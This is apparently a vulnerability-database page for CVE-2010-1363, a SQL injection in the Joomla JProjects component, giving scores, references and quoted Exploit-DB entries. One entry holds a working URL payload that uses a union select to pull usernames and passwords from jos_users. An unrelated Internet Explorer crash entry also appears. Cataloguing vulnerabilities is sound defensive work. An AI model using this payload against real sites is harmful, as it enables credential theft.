CVE-2010-1363
published 2010-04-13CVE-2010-1363: SQL injection vulnerability in the JProjects (com_j-projects) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the project…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.5th percentile
SQL injection vulnerability in the JProjects (com_j-projects) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the project parameter in a projects action to index.php.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service
exploitdb·2010-01-18
CVE-2010-0187 Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service
Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service
---
# Version: 6/7/8
# Tested on: Windows XP SP3 English & Windows 7
# CVE :
# Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11182.tar.gz (ie_crash.tar.gz)
Description: Modified 1360. byte to 44, 1361. to 43, 1362. 42, 1363.
byte to 41 of a sample swf file, ran it and crash occurred.
Screenshots:
Internet Explorer 6 - XP SP3 - http://www.mertsarica.com/images/ie6_xp_sp3_3.jpg
Internet Explorer 7 - XP SP3 - http://www.mertsarica.com/images/ie7_xp_sp3_1.jpg
Internet Explorer 8 - Windows 7 - http://www.mertsarica.com/images/ie8_win7.jpg
Exploit-DB
Joomla! Component com_j-projects - Blind SQL Injection
exploitdb·2010-01-04
CVE-2010-1363 Joomla! Component com_j-projects - Blind SQL Injection
Joomla! Component com_j-projects - Blind SQL Injection
---
#############################################################
# Joomla Component com_j-projects Blind SQL Injection Vulnerability
#############################################################
# Author : Pyske
# Name : com_j-projects
# Bug Type : Blind SQL Injection
# Infection : Admin login bilgileri al?nabilir.
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
#############################################################
path /index.php?option=com_j-projects&Itemid=102&cat=5&task=projects&project=30/**/and/**/1=0/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users
No writeups or analysis indexed.
http://packetstormsecurity.org/1001-exploits/joomlajprojects-sql.txthttp://www.exploit-db.com/exploits/10988http://www.securityfocus.com/bid/37608http://www.vupen.com/english/advisories/2010/0049https://exchange.xforce.ibmcloud.com/vulnerabilities/55361http://packetstormsecurity.org/1001-exploits/joomlajprojects-sql.txthttp://www.exploit-db.com/exploits/10988http://www.securityfocus.com/bid/37608http://www.vupen.com/english/advisories/2010/0049https://exchange.xforce.ibmcloud.com/vulnerabilities/55361
2010-04-13
Published